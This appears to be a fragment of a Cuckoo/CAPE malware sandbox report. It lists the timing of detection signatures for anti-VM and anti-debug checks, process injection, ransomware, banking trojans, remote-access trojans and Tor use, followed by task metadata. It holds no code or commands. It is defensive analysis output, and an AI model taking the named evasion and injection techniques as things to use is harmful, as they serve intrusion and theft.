  • 0.003 antianalysis_detectfile
  • 0.003 antianalysis_detectreg
  • 0.003 ransomware_extensions
  • 0.002 injection_createremotethread
  • 0.002 antisandbox_sleep
  • 0.002 InjectionCreateRemoteThread
  • 0.002 antidbg_devices
  • 0.002 geodo_banking_trojan
  • 0.002 browser_security
  • 0.001 tinba_behavior
  • 0.001 hawkeye_behavior
  • 0.001 network_tor
  • 0.001 InjectionInterProcess
  • 0.001 rat_nanocore
  • 0.001 dridex_behavior
  • 0.001 antivm_generic_services
  • 0.001 betabot_behavior
  • 0.001 kazybot_behavior
  • 0.001 InjectionProcessHollowing
  • 0.001 kibex_behavior
  • 0.001 antivm_generic_scsi
  • 0.001 cerber_behavior
  • 0.001 injection_runpe
  • 0.001 antivm_vbox_devices
  • 0.001 antivm_vbox_keys
  • 0.001 antivm_vmware_files
  • 0.001 antivm_vmware_keys
  • 0.001 bot_drive
  • 0.001 codelux_behavior
  • 0.001 disables_browser_warn
  • 0.001 network_torgateway
  • 0.001 rat_pcclient

Reporting ( 0.05 seconds )

  • 0.044 SubmitCAPE
  • 0.006 CompressResults
Task ID 25250
Mongo ID 5c05d988f284886b7cb7847b
Cuckoo release 1.3-CAPE
Delete